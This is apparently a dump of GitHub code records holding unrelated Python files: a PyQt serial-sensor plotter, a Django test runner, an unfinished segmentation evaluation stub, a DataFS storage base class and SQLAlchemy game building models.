self.widget.setLayout(layout)\n\n \n self.graphWidget_light = pg.PlotWidget()\n self.graphWidget_rotation = pg.PlotWidget()\n \n layout.addWidget(self.graphWidget_light, 0, 0)\n layout.addWidget(self.graphWidget_rotation, 0, 1)\n\n self.setCentralWidget(self.widget)\n self.setWindowTitle(\"Setting threshold to light sensor\")\n\n self.xr = list(range(100)) # 100 time points\n self.yr = [30 for _ in range(100)] # 100 data points\n \n self.xl = list(range(100)) # 100 time points\n self.yl = [30 for _ in range(100)] # 100 data points\n\n self.graphWidget_rotation.setBackground('k')\n self.graphWidget_light.setBackground('k')\n\n color1 = pg.mkPen(color=(0, 255, 255))\n self.data_line = self.graphWidget_rotation.plot(self.xr, self.yr, pen=color1)\n\n color2 = pg.mkPen(color=(255,0,0))\n self.data_line2 = self.graphWidget_light.plot(self.xl, self.yl, pen=color2)\n \n def update_plot_data_rotation(self):\n self.xr = self.xr[1:] # Remove the first y element.\n self.xr.append(self.xr[-1] + 1) # Add a new value 1 higher than the last.\n if self.rotation_sensor<6000:\n self.yr = self.yr[1:] # Remove the first \n self.yr.append(self.rotation_sensor) \n self.data_line.setData(self.xr, self.yr) # Update the data.\n \n def update_plot_data_light(self):\n self.xl = self.xl[1:] # Remove the first y element.\n self.xl.append(self.xl[-1] + 1) # Add a new value 1 higher than the last.\n\n self.yl = self.yl[1:] # Remove the first \n self.yl.append(self.light_sensor) \n if self.light_sensor>0 and self.light_sensor<2000:\n # daca e valoare mica => VERDE (0,255,0)\n color1 = pg.mkPen(color=(0,255,0)) \n self.data_line2.setData(self.xl, self.yl, pen = color1) # Update the data.\n elif self.light_sensor>2000 and self.light_sensor<4000:\n # daca e valoare mica => GALBEN (255,255,0)\n color2 = pg.mkPen(color=(255,255,0)) \n self.data_line2.setData(self.xl, self.yl, pen=color2)\n elif self.light_sensor>4000 and self.light_sensor<6000:\n # daca e valoare mica => RED (255,0,0)\n color3 = pg.mkPen(color=(255,0,0)) \n self.data_line2.setData(self.xl, self.yl, pen=color3)\n # Update the data.\n\ndef get_data_from_serial():\n global window1\n global data\n if serialInst.in_waiting:\n packet=serialInst.readline()\n \n buffer=packet.decode('utf',errors='replace').strip(\"\\n\")\n aux=buffer.split(\" \")\n if len(aux) == 3:\n if aux[1].isnumeric():\n if \"Light\" in aux[0]:\n data=aux[1]\n print(data)\n window1.light_sensor=int(data)\n \n else :\n aux=buffer.split(\" \")\n data=aux[1]\n print(data)\n window1.rotation_sensor=int(data)\n\n\napp = QtWidgets.QApplication(sys.argv)\nwindow1 = MainWindow()\nwindow1.show()\n\n\ntimer = QtCore.QTimer()\ntimer2 = QtCore.QTimer()\n\ntimer.setInterval(50)\ntimer2.setInterval(1)\ntimer2.timeout.connect(get_data_from_serial)\n\ntimer.timeout.connect(window1.update_plot_data_rotation)\ntimer.timeout.connect(window1.update_plot_data_light)\ntimer2.start()\ntimer.start()\n\nsys.exit(app.exec_())\n ","repo_name":"vred29/proiect_micro","sub_path":"pyqt/ui_micro.py","file_name":"ui_micro.py","file_ext":"py","file_size_in_byte":4441,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"72544170086","text":"#!/usr/bin/env python3\n\nimport os\nimport sys\nos.environ['DJANGO_SETTINGS_MODULE'] = 'test_settings'\ntest_dir = os.path.dirname(__file__)\nsys.path.insert(0, test_dir)\n\nimport django\nfrom django.test.utils import get_runner\nfrom django.conf import settings\n\n\ndef runtests():\n django.setup()\n TestRunner = 
get_runner(settings)\n    test_runner = TestRunner(verbosity=1, interactive=True)\n    failures = test_runner.run_tests(\n        ['quiz', 'essay', 'multichoice', 'true_false']\n    )\n    sys.exit(bool(failures))\n\nif __name__ == '__main__':\n    runtests()\n","repo_name":"tomwalker/django_quiz","sub_path":"runtests.py","file_name":"runtests.py","file_ext":"py","file_size_in_byte":561,"program_lang":"python","lang":"en","doc_type":"code","stars":560,"dataset":"github-code","pt":"52"}
+{"seq_id":"3409347725","text":"import torch\nimport numpy as np\nfrom utils.clustering import get_inst_masks\n\n\ndef preprocess_pred_inst(sem_pred, inst_pred, sem_label, inst_label):\n    \"\"\"Convert inputs into the right format to use metric evaluation scripts.\"\"\"\n    if isinstance(sem_pred, torch.Tensor):\n        sem_pred = sem_pred.cpu().numpy()\n    if isinstance(inst_pred, torch.Tensor):\n        inst_pred = inst_pred.cpu().numpy()\n    if isinstance(sem_label, torch.Tensor):\n        sem_label = sem_label.cpu().numpy()\n    if isinstance(inst_label, torch.Tensor):\n        inst_label = inst_label.cpu().numpy()\n\n    # Yang: use uint32 rather than int64 to match the dtype defined in semantic-kitti-api\n    return sem_pred.astype(np.uint32), inst_pred.astype(np.uint32), sem_label.astype(np.uint32), inst_label.astype(np.uint32)\n\n\ndef eval_average_precision_inst(inst_pred, sem_pred, sem_label, stuff_list):\n    \"\"\"get thing mask\"\"\"\n    # add class 0 (the unlabeled class) to the stuff classes;\n    # list.append returns None, so build a new list instead of assigning its result\n    stuff_unlabeled_list = stuff_list + [0]\n\n    # mask of semantic predictions belonging to stuff/unlabeled classes, inverted with ~;\n    # torch.isin expects a tensor of test elements, so wrap the class list\n    thing_mask = ~torch.isin(sem_pred, torch.tensor(stuff_unlabeled_list, device=sem_pred.device))\n\n    # get the instance/semantic predictions where only thing classes exist, and length is reduced\n    thing_inst_pred = inst_pred[thing_mask]  # does contain 0 values\n    thing_sem_pred = sem_pred[thing_mask]  # does not contain 0 values\n\n    \"\"\"get iou\"\"\"\n    # get unique inst_ids and corresponding frequencies\n    thing_inst_unique_values, frequencies = torch.unique(thing_inst_pred, return_counts=True)\n    num_clusters = len(thing_inst_unique_values)\n\n    # get inst_id mask\n    thing_inst_masks = get_inst_masks(num_clusters, thing_inst_pred)  # 0-1 float mask, cannot reduce length\n\n    # get inst_id-masked semantic prediction\n    id_masked_thing_sem_pred = thing_inst_masks * thing_sem_pred  # [number of clusters X number of points of interest]\n\n    # majority vote of semantic labels in a cluster, propagated to all points in the cluster;\n    # Tensor.mode returns a (values, indices) namedtuple, so take .values explicitly\n    majority_vote_sem_pred = id_masked_thing_sem_pred[id_masked_thing_sem_pred != 0].view(num_clusters, -1).mode(dim=-1).values  # one label per cluster\n    thing_inst_sem_pred = thing_inst_masks * majority_vote_sem_pred.view(-1, 1)  # [number of clusters X number of points of interest]\n\n    # get iou between thing_inst_sem_pred and thing_inst_sem_gt\n    thing_inst_sem_pred = torch.sum(thing_inst_sem_pred, 0)  # sum over columns, as only one value exists in each column\n    thing_inst_sem_label = sem_label[thing_mask]\n\n    \"\"\"get confusion matrix (tp/fp/fn)\"\"\"\n\n    \"\"\"get recall/precision\"\"\"\n\n    \"\"\"get average precision\"\"\"\n    # placeholder value until the confusion-matrix steps above are implemented\n    average_precision = 1\n\n    return 
average_precision\n\n","repo_name":"yanghou2000/Panoptic-Segmentation","sub_path":"utils/eval.py","file_name":"eval.py","file_ext":"py","file_size_in_byte":2941,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"71995701606","text":"import collections\nimport re\n\nimport six\n\nfrom mlsnippet.utils import maybe_close, DocInherit, AutoInitAndCloseable\nfrom .errors import UnsupportedOperation, DataFileNotExist\n\n__all__ = [\n 'DataFSCapacity',\n 'DataFS',\n]\n\n\nclass DataFSCapacity(object):\n \"\"\"\n Enumeration class to represent the capacity of a :class:`DataFS`.\n\n There are 7 different categories of capacities. Every method of\n :class:`DataFS` may only work if the :class:`DataFS` has the\n particular one or more capacities. One may check whether the\n :class:`DataFS` has a certain capacity by ``can_[capacity_name]()``.\n \"\"\"\n\n __slots__ = ('_mode',)\n\n READ_DATA = 0x1\n \"\"\"Can read file data, the basic capacity of a :class:`DataFS`.\"\"\"\n\n WRITE_DATA = 0x2\n \"\"\"Can write file data.\"\"\"\n\n READ_META = 0x4\n \"\"\"Can read meta data.\"\"\"\n\n WRITE_META = 0x8\n \"\"\"Can write meta data.\"\"\"\n\n LIST_META = 0x10\n \"\"\"Can enumerate the meta keys for a particular file.\"\"\"\n\n QUICK_COUNT = 0x20\n \"\"\"Can get the count of files without iterating through them.\"\"\"\n\n RANDOM_SAMPLE = 0x40\n \"\"\"Can randomly sample files without obtaining the whole file list.\"\"\"\n\n READ_WRITE_DATA = READ_DATA | WRITE_DATA\n \"\"\"Can read and write file data.\"\"\"\n\n READ_WRITE_META = READ_META | WRITE_META\n \"\"\"Can read and write meta data.\"\"\"\n\n ALL = (READ_WRITE_DATA | READ_WRITE_META | LIST_META |\n QUICK_COUNT | RANDOM_SAMPLE)\n \"\"\"All capacities are supported.\"\"\"\n\n def __init__(self, mode=0):\n \"\"\"\n Construct a new :class:`DataFSCapacity`.\n\n Args:\n mode (int): The mode number of this capacity flag.\n \"\"\"\n if isinstance(mode, DataFSCapacity):\n mode = mode._mode\n self._mode = int(mode)\n\n def can_read_data(self):\n return (self._mode & self.READ_DATA) != 0\n\n def can_write_data(self):\n return (self._mode & self.WRITE_DATA) != 0\n\n def can_read_meta(self):\n return (self._mode & self.READ_META) != 0\n\n def can_write_meta(self):\n return (self._mode & self.WRITE_META) != 0\n\n def can_list_meta(self):\n return (self._mode & self.LIST_META) != 0\n\n def can_quick_count(self):\n return (self._mode & self.QUICK_COUNT) != 0\n\n def can_random_sample(self):\n return (self._mode & self.RANDOM_SAMPLE) != 0\n\n def __repr__(self):\n pieces = []\n for flag in ('read_data', 'write_data', 'read_meta', 'write_meta',\n 'list_meta', 'quick_count', 'random_sample'):\n if getattr(self, 'can_{}'.format(flag))():\n pieces.append(flag)\n return '{}({})'.format(self.__class__.__name__, ','.join(pieces))\n\n def __eq__(self, other):\n return isinstance(other, DataFSCapacity) and self._mode == other._mode\n\n def __hash__(self):\n return hash(self._mode)\n\n\n@DocInherit\nclass DataFS(AutoInitAndCloseable):\n \"\"\"\n Base class for all data file systems.\n\n A :class:`DataFS` provides access to a machine learning dataset stored\n in a file system like backend. For example, large image datasets are\n usually stored as raw image files, gathered in a directory. 
Such true\n file system can be accessed by :class:`~mlsnippet.datafs.LocalFS`.\n\n Apart from the true file system, some may instead store these images in a\n database provided virtual file system, for example, the GridFS of MongoDB,\n which can be accessed via :class:`~mlsnippet.datafs.MongoFS`.\n \"\"\"\n\n _buffer_size = 65536\n \"\"\"The default buffer size for IO operations.\"\"\"\n\n _initialized = False\n \"\"\"Whether or not this :class:`DataFS` has been initialized?\"\"\"\n\n def __init__(self, capacity, strict=False):\n \"\"\"\n Initialize the base :class:`DataFS` class.\n\n Args:\n capacity (int or DataFSCapacity): Specify the capacity of the\n derived :class:`DataFS`.\n strict (bool): Whether or not this :class:`DataFS` works in\n strict mode? (default :obj:`False`)\n\n In strict mode, the following behaviours will take place:\n\n 1. Accessing the value of a non-exist meta key will cause\n a :class:`MetaKeyNotExist`, instead of getting :obj:`None`.\n \"\"\"\n self._capacity = DataFSCapacity(capacity)\n self._strict = strict\n\n @property\n def capacity(self):\n \"\"\"\n Get the capacity of this :class:`DataFS`.\n\n Returns:\n DataFSCapacity: The capacity object.\n \"\"\"\n return self._capacity\n\n @property\n def strict(self):\n \"\"\"Whether or not this :class:`DataFS` works in strict mode?\"\"\"\n return self._strict\n\n def as_flow(self, batch_size, with_names=True, meta_keys=None,\n shuffle=False, skip_incomplete=False, names_pattern=None):\n \"\"\"\n Construct a :class:`~tfsnippet.dataflow.DataFlow`, which iterates\n through the files once and only once in an epoch.\n\n The returned :class:`~mlsnippet.datafs.DataFSFlow` will hold a copy\n of this instance (obtained by :meth:`clone()`) instead of holding\n this instance itself.\n\n Args:\n batch_size (int): Size of each mini-batch.\n with_names (bool): Whether or not to include the file names\n in the returned flow? (default :obj:`True`)\n meta_keys (None or Iterable[str]): The keys of the meta data\n to be included in the returned flow. (default :obj:`None`)\n shuffle (bool): Whether or not to shuffle the files in each\n epoch of the flow? Setting this to :obj:`True` will force\n loading the file list into memory. (default :obj:`False`)\n skip_incomplete (bool): Whether or not to exclude a mini-batch,\n if it has fewer data than ``batch_size``? (default\n :obj:`False`, the final mini-batch will always be visited even\n if it has fewer data than ``batch_size``)\n names_pattern (None or str or regex): The file name pattern.\n If specified, only if the file name matches this pattern,\n would the file be included in the constructed data flow.\n Specifying this option will force loading the file list\n into memory. 
(default :obj:`None`)\n\n Returns:\n tfsnippet.dataflow.DataFlow: A dataflow, with each mini-batch\n having numpy arrays ``([filename,] content, [meta-data...])``,\n according to the arguments.\n \"\"\"\n from .dataflow import DataFSForwardFlow, DataFSIndexedFlow\n\n # quick path: use forward flow if no shuffling and name filtering\n if not shuffle and names_pattern is None:\n return DataFSForwardFlow(\n fs=self.clone(),\n batch_size=batch_size,\n with_names=with_names,\n meta_keys=meta_keys,\n skip_incomplete=skip_incomplete,\n )\n\n # slow path: load the names, then do filtering if required,\n # and use indexed flow to serve\n else:\n if names_pattern is None:\n names = self.list_names()\n else:\n names_pattern = re.compile(names_pattern)\n names = [n for n in self.iter_names() if names_pattern.match(n)]\n return DataFSIndexedFlow(\n fs=self.clone(),\n names=names,\n batch_size=batch_size,\n with_names=with_names,\n meta_keys=meta_keys,\n shuffle=shuffle,\n skip_incomplete=skip_incomplete,\n )\n\n def sub_flow(self, batch_size, names, with_names=True, meta_keys=None,\n shuffle=False, skip_incomplete=False):\n \"\"\"\n Construct a :class:`~tfsnippet.dataflow.DataFlow`, which iterates\n through the files according to selected `names`.\n\n The returned :class:`~mlsnippet.datafs.DataFSFlow` will hold a copy\n of this instance (obtained by :meth:`clone()`) instead of holding\n this instance itself.\n\n Args:\n batch_size (int): Size of each mini-batch.\n names (list[str] or np.ndarray[str]): The names to retrieve.\n with_names (bool): Whether or not to include the file names\n in the returned flow? (default :obj:`True`)\n meta_keys (None or Iterable[str]): The keys of the meta data\n to be included in the returned flow. (default :obj:`None`)\n shuffle (bool): Whether or not to shuffle the files in each\n epoch of the flow? Setting this to :obj:`True` will force\n loading the file list into memory. (default :obj:`False`)\n skip_incomplete (bool): Whether or not to exclude a mini-batch,\n if it has fewer data than ``batch_size``? (default\n :obj:`False`, the final mini-batch will always be visited even\n if it has fewer data than ``batch_size``)\n\n Returns:\n tfsnippet.dataflow.DataFlow: A dataflow, with each mini-batch\n having numpy arrays ``([filename,] content, [meta-data...])``,\n according to the arguments.\n \"\"\"\n from .dataflow import DataFSIndexedFlow\n return DataFSIndexedFlow(\n fs=self.clone(),\n names=names,\n batch_size=batch_size,\n with_names=with_names,\n meta_keys=meta_keys,\n shuffle=shuffle,\n skip_incomplete=skip_incomplete,\n )\n\n def random_flow(self, batch_size, with_names=True, meta_keys=None,\n skip_incomplete=False, batch_count=None):\n \"\"\"\n Construct a :class:`~tfsnippet.dataflow.DataFlow`, with infinite\n or pre-configured number of mini-batches in an epoch, randomly\n sampled from the whole :class:`DataFS`.\n\n The returned :class:`~mlsnippet.datafs.DataFSRandomFlow` will hold\n a copy of this instance (obtained by :meth:`clone()`) instead of\n holding this instance itself.\n\n Args:\n batch_size (int): Size of each mini-batch.\n with_names (bool): Whether or not to include the file names\n in the returned flow? (default :obj:`True`)\n meta_keys (None or Iterable[str]): The keys of the meta data\n to be included in the returned flow. (default :obj:`None`)\n skip_incomplete (bool): Whether or not to exclude a mini-batch,\n if it has fewer data than ``batch_size``? 
(default\n :obj:`False`, the final mini-batch will always be visited even\n if it has fewer data than ``batch_size``)\n batch_count (int or None): The number of mini-batches to obtain\n in an epoch. (default :obj:`None`, infinite mini-batches)\n\n Returns:\n tfsnippet.dataflow.DataFlow: A dataflow, with each mini-batch\n having numpy arrays ``([filename,] content, [meta-data...])``,\n according to the arguments.\n\n Raises:\n UnsupportedOperation: If ``RANDOM_SAMPLE`` capacity is absent.\n \"\"\"\n if not self.capacity.can_random_sample():\n raise UnsupportedOperation()\n from .dataflow import DataFSRandomFlow\n return DataFSRandomFlow(\n fs=self.clone(),\n with_names=with_names,\n meta_keys=meta_keys,\n batch_size=batch_size,\n batch_count=batch_count,\n skip_incomplete=skip_incomplete\n )\n\n def clone(self):\n \"\"\"\n Obtain a clone of this :class:`DataFS` instance.\n\n Returns:\n DataFS: The cloned :class:`DataFS`. Only the construction\n arguments will be copied. All the internal states\n (e.g., database connections) are kept un-initialized.\n \"\"\"\n raise NotImplementedError()\n\n def count(self):\n \"\"\"\n Count the files in this :class:`DataFS`.\n\n Will iterate through all the files via :meth:`iter_names()`, if\n ``QUICK_COUNT`` capacity is absent.\n\n Returns:\n int: The total number of files.\n \"\"\"\n # This is a fast way to count the items in an iterator.\n # https://github.com/wbolster/cardinality/blob/master/cardinality.py#L24\n d = collections.deque(enumerate(self.iter_names(), 1), maxlen=1)\n return d[0][0] if d else 0\n\n def iter_names(self):\n \"\"\"\n Iterate through all the file names in this :class:`DataFS`.\n\n Yields:\n str: The file name of each file.\n \"\"\"\n raise NotImplementedError()\n\n def list_names(self):\n \"\"\"\n Get the list of all the file names.\n\n Returns:\n list[str]: The file names list.\n \"\"\"\n return list(self.iter_names())\n\n def sample_names(self, n_samples):\n \"\"\"\n Sample ``n_samples`` file names from this :class:`DataFS`.\n\n Args:\n n_samples (int): Number of names to sample.\n The returned names may be fewer than this number,\n if there are less than ``n_samples`` files in this\n :class:`DataFS`.\n\n Returns:\n list[str]: The list of sampled file names.\n\n Raises:\n UnsupportedOperation: If ``RANDOM_SAMPLE`` capacity is absent.\n \"\"\"\n raise NotImplementedError()\n\n def iter_files(self, meta_keys=None):\n \"\"\"\n Iterate through all the files in this :class:`DataFS`.\n\n Args:\n meta_keys (None or Iterable[str]): The keys of the meta data\n to be retrieved. (default :obj:`None`)\n\n Yields:\n (filename, content, [meta-data...]): A tuple containing the\n name of a file, its content, and the values of each meta\n data corresponding to ``meta_keys``. If a requested key\n is absent for a file, :obj:`None` will take the place.\n\n Raises:\n UnsupportedOperation: If ``meta_keys`` is specified, but\n ``READ_META`` capacity is absent.\n \"\"\"\n meta_keys = tuple(meta_keys or ())\n for name in self.iter_names():\n yield (name,) + self.retrieve(name, meta_keys)\n\n def sample_files(self, n_samples, meta_keys=None):\n \"\"\"\n Sample ``n_samples`` files from this :class:`DataFS`.\n\n Args:\n n_samples (int): The number of files to sample.\n meta_keys (None or Iterable[str]): The keys of the meta data\n to be retrieved. 
(default :obj:`None`)\n\n Returns:\n list[(filename, content, [meta-data...])]: A list of tuples,\n each tuple contains the name of a file, its content, and\n the values of each meta data corresponding to ``meta_keys``.\n If a requested key is absent for a file, :obj:`None` will\n take the place.\n\n Raises:\n UnsupportedOperation: If ``RANDOM_SAMPLE`` capacity is absent,\n or ``meta_keys`` is specified, but ``READ_META`` capacity\n is absent.\n \"\"\"\n meta_keys = tuple(meta_keys or ())\n names = self.sample_names(n_samples)\n return [(name,) + self.retrieve(name, meta_keys) for name in names]\n\n def retrieve(self, filename, meta_keys=None):\n \"\"\"\n Retrieve the content and maybe meta data of a file.\n\n Args:\n filename (str): The name of the file to be retrieved.\n meta_keys (None or Iterable[str]): The keys of the meta data\n to be retrieved. (default :obj:`None`)\n\n Returns:\n bytes or (bytes, [meta-data...]): The content, or a tuple\n containing the content and the meta values, corresponding\n to ``meta_keys``. If a requested key is absent for a file,\n :obj:`None` will take the place.\n\n Notes:\n As long as ``meta_keys`` is not None, a tuple will always\n be returned, even if ``meta_keys`` is an empty collection.\n\n Raises:\n UnsupportedOperation: If ``meta_keys`` is specified, but\n ``READ_META`` capacity is absent.\n DataFileNotExist: If `filename` does not exist.\n \"\"\"\n if meta_keys is not None:\n meta_keys = tuple(meta_keys)\n return (self.get_data(filename),) + \\\n (meta_keys and self.get_meta(filename, meta_keys))\n else:\n return self.get_data(filename)\n\n def get_data(self, filename):\n \"\"\"\n Get the content of a file.\n\n Args:\n filename (str): The name of the file.\n\n Returns:\n bytes: The content of a file.\n DataFileNotExist: If `filename` does not exist.\n \"\"\"\n with maybe_close(self.open(filename, 'r')) as f:\n return f.read()\n\n def put_data(self, filename, data):\n \"\"\"\n Save the content of a file.\n\n Args:\n filename (str): The name of the file.\n data (bytes or file-like): The content of the file,\n or a file-like object with ``read(size)`` method.\n\n Raises:\n UnsupportedOperation: If ``WRITE_DATA`` capacity is absent.\n \"\"\"\n if isinstance(data, six.binary_type):\n with maybe_close(self.open(filename, 'w')) as f:\n f.write(data)\n elif hasattr(data, 'read'):\n with maybe_close(self.open(filename, 'w')) as f:\n while True:\n buf = data.read(self._buffer_size)\n if not buf:\n break\n f.write(buf)\n else:\n raise TypeError('`data` must be bytes or a file-like object.')\n\n def open(self, filename, mode):\n \"\"\"\n Open a file-like object to read / write a file.\n\n Args:\n filename (str): The name of the file.\n mode ({'r', 'w'}): The open mode of the file, either 'r' for\n reading or 'w' for writing. Other modes are not supported\n in general.\n\n Returns:\n file-like: The file-like object. 
This object will be immediately\n closed as soon as this :class:`DataFS` instance is closed.\n\n Raises:\n InvalidOpenMode: If the specified mode is not supported,\n e.g., ``mode == 'w'`` but ``WRITE_DATA`` capacity is absent.\n DataFileNotExist: If ``mode == 'r'`` but `filename` does not exist.\n \"\"\"\n raise NotImplementedError()\n\n def isfile(self, filename):\n \"\"\"\n Check whether or not a file exists.\n\n Args:\n filename (str): The name of the file.\n\n Returns:\n bool: :obj:`True` if ``filename`` exists and is a file,\n and :obj:`False` otherwise.\n \"\"\"\n raise NotImplementedError()\n\n def batch_isfile(self, filenames):\n \"\"\"\n Check whether or not the files exist.\n\n Args:\n filenames (Iterable[str]): The names of the files.\n\n Returns:\n list[bool]: A list of indicators, where :obj:`True` if the\n corresponding ``filename`` exists and is a file, and\n :obj:`False` otherwise.\n \"\"\"\n return [self.isfile(filename) for filename in filenames]\n\n def list_meta(self, filename):\n \"\"\"\n List the meta keys of a file.\n\n Args:\n filename (str): The name of the file.\n\n Returns:\n tuple[str]: The keys of the meta data of the file.\n\n Raises:\n DataFileNotExist: If `filename` does not exist.\n UnsupportedOperation: If the ``LIST_META`` capacity is absent.\n \"\"\"\n raise NotImplementedError()\n\n def get_meta(self, filename, meta_keys):\n \"\"\"\n Get meta data of a file.\n\n Args:\n filename (str): The name of the file.\n meta_keys (Iterable[str]): The keys of the meta data.\n\n Returns:\n tuple[any]: The meta values, corresponding to ``meta_keys``.\n If a requested key is absent for a file, :obj:`None` will\n take the place.\n\n Raises:\n DataFileNotExist: If `filename` does not exist.\n UnsupportedOperation: If the ``READ_META`` capacity is absent.\n \"\"\"\n raise NotImplementedError()\n\n def batch_get_meta(self, filenames, meta_keys):\n \"\"\"\n Get meta data of files.\n\n Args:\n filenames (Iterable[str]): The names of the files.\n meta_keys (Iterable[str]): The keys of the meta data.\n\n Returns:\n list[tuple[any] or None]: A list of meta values, or :obj:`None`\n if the corresponding file does not exist.\n \"\"\"\n meta_keys = tuple(meta_keys or ())\n ret = []\n for name in filenames:\n try:\n ret.append(self.get_meta(name, meta_keys))\n except DataFileNotExist:\n ret.append(None)\n return ret\n\n def get_meta_dict(self, filename):\n \"\"\"\n Get all the meta data of a file, as a dict.\n\n Args:\n filename (str): The name of the file.\n\n Returns:\n dict[str, any]: The meta values, as a dict.\n\n Raises:\n DataFileNotExist: If `filename` does not exist.\n UnsupportedOperation: If the ``READ_META`` or ``LIST_META``\n capacity is absent.\n \"\"\"\n meta_keys = self.list_meta(filename)\n meta_values = self.get_meta(filename, meta_keys)\n return {k: v for k, v in zip(meta_keys, meta_values)}\n\n def put_meta(self, filename, meta_dict=None, **meta_dict_kwargs):\n \"\"\"\n Update the meta data of a file. The un-mentioned meta data will\n remain unchanged. This method is not necessarily faster than\n :meth:`clear_and_put_meta`. In some backends it may be implemented\n by first calling :class:`get_meta_dict`, then updating the meta dict\n in memory, and finally calling :class:`clear_and_put_meta`.\n\n Args:\n filename (str): The name of the file.\n meta_dict (dict[str, any]): The meta values to be updated.\n **meta_dict_kwargs: The meta values to be updated, as keyword\n arguments. 
This will override the values provided in\n ``meta_dict``.\n\n Raises:\n DataFileNotExist: If `filename` does not exist.\n UnsupportedOperation: If the ``WRITE_META`` capacity (and\n possibly the ``READ_META`` capacity) is(are) absent.\n \"\"\"\n raise NotImplementedError()\n\n def clear_and_put_meta(self, filename, meta_dict=None, **meta_dict_kwargs):\n \"\"\"\n Set the meta data of a file. The un-mentioned meta data will be\n cleared. This method is not necessarily slower than :meth:`put_meta`.\n\n Args:\n filename (str): The name of the file.\n meta_dict (dict[str, any]): The meta values to be updated.\n **meta_dict_kwargs: The meta values to be updated, as keyword\n arguments. This will override the values provided in\n ``meta_dict``.\n\n Raises:\n DataFileNotExist: If `filename` does not exist.\n UnsupportedOperation: If the ``WRITE_META`` capacity (and\n possibly the ``LIST_META`` capacity) is(are) absent.\n \"\"\"\n self.clear_meta(filename)\n self.put_meta(filename, meta_dict, **meta_dict_kwargs)\n\n def clear_meta(self, filename):\n \"\"\"\n Clear all the meta data of a file.\n\n Args:\n filename (str): The name of the file.\n\n Raises:\n DataFileNotExist: If `filename` does not exist.\n UnsupportedOperation: If the ``WRITE_META`` capacity (and\n possibly the ``LIST_META`` capacity) is(are) absent.\n \"\"\"\n raise NotImplementedError()\n","repo_name":"haowen-xu/mlsnippet","sub_path":"mlsnippet/datafs/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":24149,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"72291016486","text":"\"\"\"Provides the BuildingType and Building classes.\"\"\"\n\nfrom datetime import datetime\n\nfrom sqlalchemy import Column, Integer, ForeignKey, Boolean\nfrom sqlalchemy.orm import relationship\n\nfrom .base import (\n Base, NameMixin, CoordinatesMixin, ResistanceMixin, LocationMixin,\n OwnerMixin, ResourcesMixin, TypeMixin, SoundMixin, MaxHealthMixin,\n HealthMixin, GetNameMixin\n)\n\n\nclass BuildingRecruit(Base, ResourcesMixin):\n \"\"\"Provides a link betwene building and unit types, allowing buildings\n to provide units. Resources are used during reruitment.\"\"\"\n\n __tablename__ = 'building_recruits'\n building_type_id = Column(\n Integer, ForeignKey('building_types.id'), nullable=False\n )\n unit_type_id = Column(\n Integer, ForeignKey('unit_types.id'), nullable=False\n )\n pop_time = Column(Integer, nullable=False, default=4)\n\n\nclass BuildingType(\n Base, NameMixin, ResistanceMixin, ResourcesMixin, SoundMixin,\n MaxHealthMixin\n):\n \"\"\"A type of building. 
Resources are used during construction.\"\"\"\n\n __tablename__ = 'building_types'\n depends_id = Column(\n Integer, ForeignKey('building_types.id'), nullable=True\n )\n depends = relationship(\n 'BuildingType', foreign_keys=[depends_id], backref='dependencies',\n remote_side='BuildingType.id'\n )\n recruits = relationship(\n 'UnitType', backref='recruiters', secondary=BuildingRecruit.__table__\n )\n landing_field = Column(Boolean, nullable=False, default=False)\n\n def get_pop_time(self, unit_type):\n \"\"\"Get the pop time for the given UnitType instance.\"\"\"\n return BuildingRecruit.one(\n building_type_id=self.id, unit_type_id=unit_type.id\n ).pop_time\n\n def set_pop_time(self, unit_type, value):\n \"\"\"Set the pop time for the given UnitType instance to the given\n value.\"\"\"\n BuildingRecruit.query(\n building_type_id=self.id, unit_type_id=unit_type.id\n ).update(\n {BuildingRecruit.pop_time: value}\n )\n\n def add_recruit(self, type, **resources):\n \"\"\"Add the given UnitType instance as a recruit of this building\n type. It will cost the provided resources to recruit.\"\"\"\n return BuildingRecruit(\n unit_type_id=type.id, building_type_id=self.id, **resources\n )\n\n def get_recruit(self, type):\n \"\"\"Return the BuildingRecruit instance that represents the given\n UnitType instance.\"\"\"\n return BuildingRecruit.one(\n building_type_id=self.id, unit_type_id=type.id\n )\n\n\nclass Building(\n Base, CoordinatesMixin, LocationMixin, OwnerMixin, TypeMixin,\n ResourcesMixin, HealthMixin, GetNameMixin\n):\n \"\"\"A building on a map. Resources are used for storage.\"\"\"\n\n __tablename__ = 'buildings'\n __type_class__ = BuildingType\n\n def add_skill(self, skill_type, activate=None):\n \"\"\"Add the given member of the SkillTypes enumeration to this\n building. If activate is None, it will be set to datetime.utcnow. The\n skill will not become active until that time.\"\"\"\n if activate is None:\n activate = datetime.utcnow()\n assert type(skill_type).__name__ == 'SkillTypes', \\\n 'Invalid value %r.' 
% skill_type\n        Skill = Base._decl_class_registry['Skill']\n        return Skill(\n            building=self, skill_type=skill_type, activated_at=activate\n        )\n\n    @property\n    def skill_types(self):\n        Skill = Base._decl_class_registry['Skill']\n        return [s.skill_type for s in Skill.query(building=self)]\n\n    def has_skill(self, member):\n        \"\"\"Given one of the members of the SkillTypes enumeration, return the\n        number of skills of that type that are attached to this building.\"\"\"\n        Skill = Base._decl_class_registry['Skill']\n        return Skill.count(skill_type=member, building_id=self.id)\n\n    def get_full_name(self):\n        if self.owner is None:\n            owner = 'Unclaimed'\n        else:\n            owner = str(self.owner)\n        return f'{self.get_name()} ({owner})'\n","repo_name":"chrisnorman7/pyrts","sub_path":"server/db/buildings.py","file_name":"buildings.py","file_ext":"py","file_size_in_byte":4082,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
